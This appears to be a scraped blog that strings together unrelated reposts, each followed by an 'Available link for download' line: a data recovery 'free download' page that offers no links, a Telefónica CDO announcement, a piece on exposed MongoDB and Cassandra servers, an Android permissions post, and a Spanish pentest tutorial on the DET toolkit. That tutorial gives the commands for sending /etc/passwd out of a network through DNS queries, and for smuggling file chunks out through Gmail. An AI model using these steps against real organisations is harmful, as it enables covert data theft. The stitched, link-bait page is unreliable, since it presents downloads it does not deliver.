Tuesday, February 14, 2017
Android Mobiles Data Recovery Software Tool Free Download
Android Mobiles Data Recovery Software Tool Free Download

Now you can download android mobiles data recovery tool form below downloading links. If you are facing trouble or unable to download please contact us via commenting we will change or update downloading links. You will need to keep updating your software for best performance.
Downloading links
Android Data Recovery Software
Available link for download
Thursday, January 19, 2017
Mi nueva vida como Chief Data Officer en Telefónica
Mi nueva vida como Chief Data Officer en Telefónica
![]() |
| Figura 1: Mi nueva vida como CDO en Telefónica |
La verdad es que no pensaba hablar mucho de este nuevo rol y esperar, como hice con el lanzamiento de Eleven Paths, unos meses hasta que me hubiera dado tiempo a organizarme bien, pero viendo que salió en tantos medios de comunicación, e incluso en el Telediario Nacional de TVE1, creo que no va a ser posible esperar ese tiempo, así que os cuento un poco en resumen qué he estado haciendo en Telefónica estos años y qué voy a hacer ahora.
![]() |
| Figura 2: El popular presentador Andreu Buenafuente con el gorro de rallas y las melenas |
![]() |
| Figura 3: Año 20102. Con Javier Santiso (mi compañero en la creación de Telefónica Talentum) en la primera selección de jóvenes para los programas de Talentum Startups Short Track & Long Track |
Figura 4: KeyNote Security Innovation Day 2014. Resumen de dos años en Eleven Paths
Figura 5: KeyNote Security Innovation Day 2015. Resumen del año en Eleven Paths
Figura 6: Conferencia de Big Data y Privacidad en Fundación Telefónica
Para la compañía, esta evolución es muy importante, y por eso el puesto de CDO está dentro del comité ejecutivo desde su concepción. Ahora soy yo el que tengo que continuar el buen hacer de Ian Small, quien se ha ocupado del rol de CDO desde que se constituyó el año pasado, además de continuar con el buen hacer que desde hace años los equipos de Seguridad de la Información y BI / Big Data han hecho en Telefónica.
Figura 7: Discurso de "la servilleta", el día que me hicieron embajador
Después, gracias a la aparición de las técnicas de SQL Injection, todo ese conocimiento en el lenguaje SQL me llevó al mundo de la seguridad informática y a hacer mi doctorado en técnicas de inyección de comandos a ciegas - muy motivado por el conocimiento en bases de datos que tenía -. Ahora, el mundo de la seguridad se movió hacia el Big Data y se cierra un círculo que me llevó de la gestión de los datos a la seguridad de la información y ahora a la gestión segura de grandes volúmenes de datos. Y no solo estoy contento, estoy contento e ilusionado por comenzar a disfrutar de todas estas tecnologías juntas.
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Tuesday, December 13, 2016
4 4 4 mobile data issue
4 4 4 mobile data issue
I tried clearing the cache to no avail. Any ideas?
from xda-developers http://ift.tt/2asPDmS
via IFTTT
Available link for download
Monday, November 21, 2016
Big Data Security Tales MongoDB Cassandra Level 101
Big Data Security Tales MongoDB Cassandra Level 101
![]() |
| Figura 1: Big Data Security Tales: MongoDB & Cassandra (Level 101) |
Figura 2: Tecnologías de Big Data y CiberSeguridad
Por supuesto, el gran manejo de datos que es posible realizar hoy en día permite a las empresas capturar detalles, insignificantes a priori, de sus usuarios que llevan a un conocimiento tal de los mismos que la privacidad queda en serio riesgo. Exponente de este tipo son las tecnologías de WebBrowsing Fingerprinting que son capaces de llegar al mínimo detalle de los usuarios para saber quién es quién sin necesidad de que se lo diga. De esto hice una charla hace ya unos años.
Figura 3: Big Data y Privacidad
Otra de las caras del prisma en el que convergen la seguridad y el mundo del Big Data son los servicios de pentesting y auditoría de los mismos. No son nuevos los problemas con estos entornos, como ya vimos en el caso de los servidores MongoDB que podemos localizar por Internet sin ningún control de seguridad, y con todos los datos expuestos con solo hacer un poco de hacking con buscadores. Además, tampoco son inmunes a las técnicas de inyección de comandos, como ya vimos en el artículo de técnicas de MongoDB Injection.
![]() |
| Figura 4: Bases de datos MongoDB accesibles sin autenticación |
Cassandras inseguros en Internet
![]() |
| Figura 5: Casi 2.000 clusters de bases de datos Cassandra publicadas en Internet |
![]() |
| Figura 6: Datastax OpsCenter abierto a Internet |
![]() |
| Figura 7: Datastax OpsCenter indexados en Google |
![]() |
| Figura 8: Paneles OpsCenter publicados en Internet |
![]() |
| Figura 9: Agregar un cluster Cassandra a OpsCenter para administrarlo remotamente |
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Tuesday, November 15, 2016
Data Exfiltration Toolkit DET Filtrando documentos fuera de la empresa por canales encubiertos estego
Data Exfiltration Toolkit DET Filtrando documentos fuera de la empresa por canales encubiertos estego
![]() |
| Figura 1: Data Exfiltration Tookit (DET) Filtrando documentos fuera de la empresa por canales encubiertos |
La encapsulación de información dentro de protocolos comunes como TCP, o el uso de canales encubierto ocultando ficheros en ficheros, usando conexiones vía Radio Frecuencia, GSM o Calor, e incluso los SSID de una WiFi, pueden ser las vías más utilizadas para extraer información de una organización. Y por ello existe toda una disciplina de estudio centrada en la esteganografía y el estegoanálisis.
DET: Data Exfiltration Toolkit
DET, Data Exfiltration Toolkit, es una herramienta que permite realizar Data Exfiltration utilizando uno o varios canales a la vez. La idea que está detrás de DET es la de disponer de una herramienta genérica que facilite encapsular información dentro de un protocolo o utilizar servicios de terceros, por ejemplo Gmail o Twitter, para extraer la información. DET puede ser descargado desde su sitio web en Github, dónde además podemos encontrar diversas pruebas de concepto muy interesantes.
En el artículo de hoy realizaremos una prueba de concepto de esta herramienta para ver cómo se puede sacar información de una red a través del uso de protocolos comunes. Para descargar DET se deben ejecutar estas instrucciones:
git clone https://github.com/sensepost/DET.gitEsta última instrucción descargará e instalará todas las dependencias referentes a Python, que es el lenguaje en el que DET está implementado.
pip install r requirements.txt user.
PoC 1: Enviando un fichero a través del protocolo DNS con DET
Las opciones que DET proporciona son realmente interesantes. Si se echa un vistazo rápido a las diversas opciones se puede observar las siguientes:
La posibilidad de configurar un fichero dónde se indican los parámetros que tanto el cliente y servidor deben conocer. Por ejemplo, el contenido se cifra con AES-256 a través de una clave que se indica en el fichero de configuración.
La opción de extraer un directorio o un fichero en concreto.
La posibilidad de indicar el plugin o listado de éstos que se quiere utilizar. Esto es útil si no queremos lanzar todos los plugins.
Los plugins disponibles en estas primeras versiones de DET son: HTTP, Google Docs, DNS, Gmail, TCP, UDP, Twitter o el protocolo ICMP.
Además, existen unos scripts escritos para Powershell para llevar a cabo este tipo de técnicas desde entornos Microsoft.DET proporciona dos roles diferenciados. La máquina que se encuentre en el exterior de la organización hará las funciones de servidor y será el que espere recibir el fichero robado de la organización. Por otro lado, el rol cliente será el encargado de generar la conexión desde el interior y utilizar los diversos plugins para enviar el fichero o carpeta hacia el servidor.
Lo primero es hablar del fichero config.json. DET trae un json de prueba denominado config-sample.json, con el que se puede ver los diferentes protocolos, denominados plugins en este contexto, y las diferentes configuraciones de estos.
![]() |
| Figura 2: Configuración de DET |
Como se puede visualizar en la imagen, en el caso del protocolo DNS, se puede utilizar haciendo peticiones al dominio pablo.com, a la dirección IP 192.168.56.103 y el puerto 53. El dominio, en este caso, se utiliza a modo de clave. Otra parte interesante del archivo config.json es el atributo AES_KEY, dónde se indica el valor de la clave AES que deben conocer tanto servidor como cliente para cifrar el contenido. Además, se puede ver un randomize entre el número de peticiones enviados, para intentar evitar que elementos de seguridad bloqueen o detecten el patrón.
| Figura 3: Configuración del patrón de cambio |
Ahora, se procede a configurar el servidor en una máquina Linux. Para este caso sencillo, se utilizan los parámetros L para indicar que el modo de ejecución es servidor, es decir, se recibirá el fichero robado en esta máquina. Se utiliza el parámetro c para indicar la configuración de los plugins y cuál es la clave de cifrado utilizada. Y, por último, se añade el parámetro p y se indica dns. Con esto se le dice al servidor que solo configure el plugin de DNS, que será el protocolo utilizado para enviar la información.
| Figura 4: Configuración del listener que recibirá los paquetes de datos |
Ahora, el cliente empleará el protocolo DNS para realizar queries del siguiente modo:
- Query 1. [Contenido Cifrado].pablo.com.Para configurar esto se debe ejecutar la siguiente instrucción:
- Query 2. [Contenido Cifrado].pablo.com
-
- Query N. [Contenido Cifrado].pablo.com.
python det.py c ./config.json f [fichero a extraer de la organización] p dns.
| Figura 5: Envío del fichero /etc/passwd |
Si analizamos con Wireshark la red podemos ver un gran número de consultas repartidas en el tiempo y por bloques de bytes. El truco en este caso está en los subdominios utilizados junto al dominio pablo.com. En la siguiente imagen se puede ver una captura de queries que se envían hacia al servidor, cada subdominio es un trozo de fichero que el servidor se encargará de descifrar y procesar.
| Figura 6: Consultas al servidor DNS vistas con Wireshark |
Una vez todo el fichero es enviado hasta el servidor, éste se encarga de recuperarlo, unirlo y descifrarlo. El resultado es el fichero original, pero ya fuera de los dominios de la organización. Por supuesto, existen medidas para detectar este tipo de comportamientos, pero son medidas de seguridad más avanzadas que las comunes.
| Figura 7: Fichero totalmente recibido |
La utilización de protocolos para encapsular información y poder sacarla de una organización es una vía viable y muy efectiva, aunque por supuesto el éxito de la operación dependerá del tiempo necesario y las medidas de seguridad de las que conste la empresa.
| Figura 8: El fichero ha sido exfiltrado y recompuesto completamente |
El fichero queda almacenado en el servidor con el nombre [original].[fecha]. Tal y como se puede visualizar en la imagen, se obtiene el fichero passwd original y totalmente legible para cualquier usuario del exterior. El robo y la extracción de información del interior de la organización ha sido llevado a cabo de forma silenciosa.
PoC 2: Robando información a través de la cuenta de Gmail
En esta segunda prueba de concepto el escenario es muy similar. La única diferencia es que el cliente se conectará al puerto 587 de Gmail para dejar en su bandeja de entrada distintos mensajes de e-mail con trozos cifrados de archivo y codeados en Base64. Hay que modificar el fichero config.json e indicar el usuario y contraseña de la cuenta de Gmail.
Una vez realizado este paso hay que lanzar el servidor con la configuración adecuada de Gmail. Para ello se indica con el parámetro p que el plugin a utilizar es el de Gmail y sólo ese.
| Figura 9: Recepción del fichero vía Gmail |
El cliente se invoca de forma similar a cómo se hizo en la prueba de concepto anterior, salvo que la configuración del json ha cambiado en el plugin de Gmail y que se indica que solo se quiere utilizar el plugin de Gmail. Es bastante interesante ver cómo se indica que se envían e-mails a uno mismo para ir dejando la información en los distintos correos electrónicos.
| Figura 10: Envío de fichero desde el cliente vía Gmail |
Si se entrase a través del navegador a la cuenta de Gmail utilizada para este ejercicio se podría ver cómo hay diferentes correos electrónicos dónde se puede ver un contenido en base64, el cual son trozos de ficheros.
| Figura 11: Mensajes de correo dejados en Gmail con trozos Base64 del fichero exfiltrado |
Esta vía de Data Exfiltration es una manera sencilla y limpia utilizando un tercero de confianza, como puede ser Gmail, para extraer dicha información. ¿Y en tu empresa? ¿Qué medidas tienes para evitar este robo de información o extracción de información sensible corporativa? Hay que tener en cuenta que a veces no basta con sacar el fichero, ya que este puede llevar un "callback home" que avise cada vez que se abre de la ubicación desde dónde ha sido abierto, así que no solo hay que robarlo, hay que conseguir abrirlo sin que se enteren, pero de eso ya hablaremos en otro momento.
Autor: Pablo González Pérez (@pablogonzalezpe)
Escritor de los libros "Metasploit para Pentesters", "Ethical Hacking" y Pentesting con Powershell
Sigue Un informático en el lado del mal - Google+ RSS 0xWord

Available link for download
Tuesday, October 25, 2016
Marshmallow and User Data
Marshmallow and User Data

Posted by Joanna Smith, Developer Advocate and Giles Hogben, Google Privacy Team
Marshmallow introduced several changes that were designed to help your app look after user data. The goal was to make it easier for developers to do the right thing. So as Android 6.0, Marshmallow, gains traction, we challenge you to do just that.
This post highlights the key considerations for user trust when it comes to runtime permissions and hardware identifiers, and points you to new best practices documentation to clarify what to aim for in your own app.
Permission Changes
With Marshmallow, permissions have moved from install-time to runtime. This is a mandatory change for SDK 23+, meaning it will affect all developers and all applications targeting Android 6.0. Your app will need to be updated anyway, so your challenge is to do so thoughtfully.
Runtime permissions mean that your app can now request access to sensitive information in the context that it will be used. This gives you a chance to explain the need for the permission, without scaring users with a long list of requests.
Permissions are also now organized into groups, so that users can make an informed decision without needing to understand technical jargon. By allowing your users to make a decision, they may decide not to grant a permission or to revoke a previously-granted permission. So, your app needs to be thoughtful when handling API calls requiring permissions that may have been denied, and about building in graceful failure-handling so that your users can still interact with the rest of your app.
Identifier Changes
The other aspect of user trust is doing the right thing with user data. With Marshmallow, we are turning off access to some kinds of data in order to direct developers down this path.
Most notably, Local WiFi and Bluetooth MAC addresses are no longer available. The getMacAddress() method of a WifiInfo object and the BluetoothAdapter.getDefaultAdapter().getAddress() method will both return 02:00:00:00:00:00 from now on.
However, Google Play Services now provides Instance IDs, which identify an application instance running on a device. Instance IDs provide a reliable alternative to non-resettable, device-scoped hardware IDs, as they will not persist across a factory reset and are scoped to an app instance. See the Google Developers What is Instance ID? help article for more information.
Whats Next
User trust depends largely on what users see and how they feel. Mishandling permissions and identifiers increases the risk of unwanted/unintended tracking, and can result in users feeling that your app doesnt actually care about the user. So to help you get it right, weve created new documentation that should enable developers to be certain that their app is doing the right thing for their users.
- Understand how permissions and user data are linked
- Learn more about the best practices for permissions
- Discover the best practices for unique identifiers, with clarity based on changes in Marshmallow.
So happy developing! May your apps make users happy, and may your reviews reflect that. :)
Available link for download
Monday, September 26, 2016
Get free unlimited Pokémon Go data during the next T Mobile Tuesday
Get free unlimited Pokémon Go data during the next T Mobile Tuesday
T-Mobile customers thatve been playing Pokémon Go but have been fretting about using up all their data to expand their Pokédex will soon have nothing to worry about.
from PhoneDog.com - Latest videos, reviews, articles, news and posts http://ift.tt/29yKXeq
via IFTTT
Available link for download
Wednesday, August 17, 2016
Export Google Fit Data
Export Google Fit Data
Google Takeout has recently added support for exporting Google Fit data. Youll be able to download some CSV and TCX files that include your activities and daly aggregations.
* TCX (Training Center XML) is a common file format for fitness activity data that can be imported to many fitness tracking tools such as Garmin Connect and Strava. By default, Fit samples location data with low accuracy and frequency to reduce device battery consumption. These Activities are exported into the Low Accuracy folder. Activities recorded with Fits active mode will contain more detailed location paths and more accurate data.
* CSV files are easily read by spreadsheet software or parsed programmatically but may not be easy to import into fitness tracking software.



Available link for download











